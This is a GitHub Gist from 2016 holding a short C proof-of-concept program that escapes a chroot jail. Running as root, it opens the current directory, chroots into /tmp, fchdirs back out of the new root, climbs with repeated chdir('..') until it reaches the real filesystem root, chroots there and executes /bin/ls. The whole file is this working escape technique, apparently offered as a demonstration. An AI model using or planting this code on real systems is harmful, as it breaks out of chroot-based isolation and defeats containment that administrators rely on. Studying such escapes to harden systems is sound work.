Created
November 24, 2016 14:14
-
-
Save farhaven/97daa71c6fca3ae330fa54b32749db84 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <sys/types.h> | |
| #include <sys/stat.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <fcntl.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <errno.h> | |
| #define check(x, m) do { \ | |
| if((*m) != 0x00) puts(m); \ | |
| if(!(x)) break; \ | |
| printf("checked: "); \ | |
| puts(strerror(errno)); \ | |
| exit(1); \ | |
| } while (0) | |
| int | |
| main(int argc, char **argv) { | |
| char *a[] = { "ls", NULL }; | |
| struct stat s1, s2; | |
| int fd; | |
| if (getuid() != (uid_t) 0) { | |
| puts("you need to be root :/"); | |
| exit(1); | |
| } else if (geteuid() != (uid_t) 0) { | |
| puts("EUID != 0, needs to be reset..."); | |
| seteuid((uid_t) 0); | |
| } | |
| check(((fd = open(".", O_RDONLY, O_DIRECTORY)) < 0), "opening ."); | |
| /* XXX: maybe create a temporary dir? */ | |
| check(chroot("/tmp"), "chrooting to /tmp"); | |
| check(fchdir(fd), "changing back to original root"); | |
| close(fd); | |
| puts("escaping..."); | |
| for(;;) { | |
| stat(".", &s1); | |
| chdir(".."); | |
| stat(".", &s2); | |
| if ((s1.st_dev == s2.st_dev) && (s1.st_ino == s2.st_ino)) | |
| break; | |
| } | |
| check(chroot("."), "chrooting to ."); | |
| check(execv("/bin/ls", a), "Is this your root?"); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment